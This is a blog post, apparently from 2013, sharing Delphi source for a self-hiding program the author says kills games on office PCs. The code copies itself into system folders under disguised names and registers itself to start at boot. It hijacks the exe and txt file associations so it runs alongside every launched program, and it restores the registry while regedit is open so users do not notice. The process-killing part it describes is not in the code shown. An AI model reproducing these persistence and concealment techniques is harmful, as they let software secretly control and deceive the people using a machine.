DELPHI實現關閉指定程式,自身防殺

lykyl的自留地發表於2013-10-18

偶然翻到很久以前用DELPHI寫的一個小程式,實現功能是在後臺默默關閉符合條件的程式,並隱藏自身。編寫目的是為了防止辦公電腦執行遊戲。

實現原理是:

1、程式執行後將自身以不同的名稱一式三份存到系統各目錄中,將其中一個COPY寫到登錄檔裡開機自啟動,然後修改登錄檔中txt檔案和exe檔案開啟方式分別指向另兩個COPY,達到監控目的。

2、程式一但啟用首先會確認各COPY是否存在以及登錄檔關聯是否正常,然後再檢查系統是否執行在禁止名單中的程式,發現就殺死。

3、如果程式監控到使用者執行regedit則會將登錄檔改回正常值,當regedit退出後再將修改寫回,以防使用者發現。(這在防毒軟體還很落後的年代效果還是相當好的)

4、程式保留了解除安裝的功能,程式碼裡有寫。

自己感覺挺有意思,把程式碼發上來留個紀念。

 

  1 //為了防止一些人上班就玩遊戲的惡習所編
  2 program HK;
  3 
  4 uses
  5   Windows,
  6   Messages,
  7   SysUtils,
  8   System,
  9   Classes,
 10   Registry,
 11   Forms,
 12   Controls,
 13   LoadDLL in 'LoadDLL.pas';
 14   
 15 var
 16   I:Integer;
 17   SPath,WPath:PCHAR;
 18   pa:string;
 19   hnd: THandle;
 20   sp:boolean;
 21   sFileName:String;
 22 
 23 
 24 //function RegisterServiceProcess(dwProcessId, dwServiceType: DWord): Bool; stdcall;
 25 
 26 //function RegisterServiceProcess; external 'Kernel32.dll' Name 'RegisterServiceProcess';
 27 
 28 procedure procRun(exeName,exePath:PChar;trace:boolean);
 29 var
 30   SUInfo: TStartupInfo;
 31   ProcInfo: TProcessInformation;
 32 begin
 33 FillChar(SUInfo, SizeOf(SUInfo), #0);
 34 with SUInfo do
 35   begin
 36     cb := SizeOf(SUInfo);
 37     dwFlags := STARTF_USESHOWWINDOW;
 38     wShowWindow :=1;
 39   end;
 40 if CreateProcess(NIL,exeName, NIL, NIL, FALSE,CREATE_NEW_CONSOLE or NORMAL_PRIORITY_CLASS, NIL,exePath, SUInfo, ProcInfo) then
 41   begin
 42     if trace then
 43       WaitForSingleObject(ProcInfo.hProcess, INFINITE);
 44     CloseHandle(ProcInfo.hProcess);
 45     CloseHandle(ProcInfo.hThread);
 46   end;
 47 end;
 48 
 49 procedure procSetReg(rest:boolean);
 50 var
 51    Reg:TRegistry;
 52 begin
 53    Reg:=Tregistry.Create;
 54    try
 55    if rest then
 56    begin
 57      reg.rootkey:=HKEY_CLASSES_ROOT;
 58      if reg.OpenKey('\txtfile\shell\open\command',true) then
 59         reg.WriteExpandString('',WPath+'\NOTEPAD.exe %1');
 60      reg.closekey;
 61      if reg.OpenKey('\exefile\shell\open\command',true) then
 62         reg.WriteExpandString('','"%1" %*');
 63      reg.closekey;
 64      reg.RootKey:=HKEY_LOCAL_MACHINE;
 65      if reg.openkey('\Software\Microsoft\Windows\CurrentVersion\Run',True) then
 66         reg.DeleteValue('SysOleRun');
 67       reg.closekey;
 68    end
 69    else
 70    begin
 71       reg.RootKey:=HKEY_LOCAL_MACHINE;
 72       if reg.openkey('\Software\Microsoft\Windows\CurrentVersion\Run',True) then
 73           reg.writestring('SysOleRun',spath+'\ObjDDC.exe');
 74       Reg.CloseKey;
 75       reg.rootkey:=HKEY_CLASSES_ROOT;
 76       if reg.OpenKey('\txtfile\shell\open\command',true) then
 77           reg.WriteExpandString('',spath+'\WinODBC.exe %1');
 78       reg.closekey;
 79       if reg.OpenKey('\exefile\shell\open\command',true) then
 80           reg.WriteExpandString('',spath+'\OLEDevice.exe %1 %*');
 81       reg.closekey;
 82    end;
 83   finally
 84     Reg.Free;
 85   end;
 86 end;
 87 
 88 procedure BeepEx(feq:word=1200;delay:word=1);
 89 
 90   procedure BeepOff;
 91    begin
 92      asm
 93        in al,$61;
 94        and al,$fc;
 95        out $61,al;
 96      end;
 97   end;
 98 const
 99   scale=1193180;
100 var
101   temp:word;
102 begin
103   temp:=scale div feq;
104   asm
105     in al,61h;
106     or al,3;
107     out 61h,al;
108     mov al,$b6;
109     out 43h,al;
110     mov ax,temp;
111     out 42h,al;
112     mov al,ah;
113     out 42h,al;
114   end;
115   sleep(delay);
116   beepoff;
117 end;
118 
119 procedure UserPass();
120 var
121    a,b:integer;
122    t:longword;
123    UserName:PCHAR;
124 begin
125    if sp then
126       begin
127        t:=255;
128       GetMem(UserName,255);
129       try
130         getusername(UserName,t);
131         if UserName<>'lykyl' then
132           begin
133              messagebox(0,'非法使用者,操作限制!','系統警告!',MB_OK);
134              for a:=1 to 1 do
135               begin
136               SendMessage(0, WM_SYSCOMMAND, SC_MONITORPOWER, 0);
137                for b:=1 to 2 do
138                  begin
139                       BeepEx(1500,200);
140                       beepex(3000,200);
141                  end;
142                SendMessage(0, WM_SYSCOMMAND, SC_MONITORPOWER, -1);
143                messagebox(0,'非法使用者身份確定','系統警告!',MB_OK);
144               end;
145           end;
146         finally
147           freemem(UserName);
148         end;
149       end;
150 end;
151   {$R *.RES}
152 
153 begin
154    hnd := CreateMutex(nil, True, 'irgendwaseinmaliges');
155    if GetLastError = ERROR_ALREADY_EXISTS then
156       sp:=false
157    else
158       sp:=true;
159   //RegisterServiceProcess(0, RSP_SIMPLE_SERVICE);
160   GetMem(SPath,255);
161   GetMem(WPath,255);
162   GetSystemDirectory(SPath,255);
163   GetWindowsDirectory(WPath,255);
164   SetLength(sFileName,255);
165   GetModuleFileName(GetCurrentProcess,Pchar(sFileName),255);
166   sFileName:=Pchar(sFileName);
167   try
168     if ExtractFileName(sFileName)='lykyl.exe' then
169        procSetReg(true)
170     else
171     begin
172     Copyfile(pchar(sFileName),pchar(spath+'\WinODBC.exe'),false);
173     Copyfile(pchar(sFileName),pchar(spath+'\OLEDevice.exe'),false);
174     Copyfile(pchar(sFileName),pchar(WPath+'\ObjDDc.exe'),false);
175     procSetReg(false);
176     for i:=1 to ParamCount do
177         if i=1 then
178            pa:=ParamStr(i)
179         else
180            pa:=pa+' '+ParamStr(i);
181     if Pa <>'' then
182       begin
183           if ExtractFileName(sFileName)='WINODBC.EXE' then
184             begin
185               UserPass();
186               procRun(PChar(WPath+'\NOTEPAD.EXE '+pa),PChar(ExtractFilePath(WPath+'\')),false);
187             end
188           else
189               if ExtractFileName(sFileName)='OLEDEVICE.EXE' then
190                begin
191                   UserPass();
192                   if AnsiStrPos(pchar(pa),'regedit')<>nil then
193                      begin
194                           procSetReg(true);
195                           procRun(PChar(pa),PChar(ExtractFilePath(pa)),true);
196                           procSetReg(false);
197                      end
198                   else
199                      begin
200                          procRun(PChar(pa),pchar(extractfilepath(pa)),false);
201                      end;
202                end;
203       end;
204       end;
205   finally
206     freemem(SPath);
207     freemem(WPath);
208     if hnd <> 0 then CloseHandle(hnd);
209 //    RegisterServiceProcess(0, RSP_UNREGISTER_SERVICE);
210   end;
211 end.

 

相關文章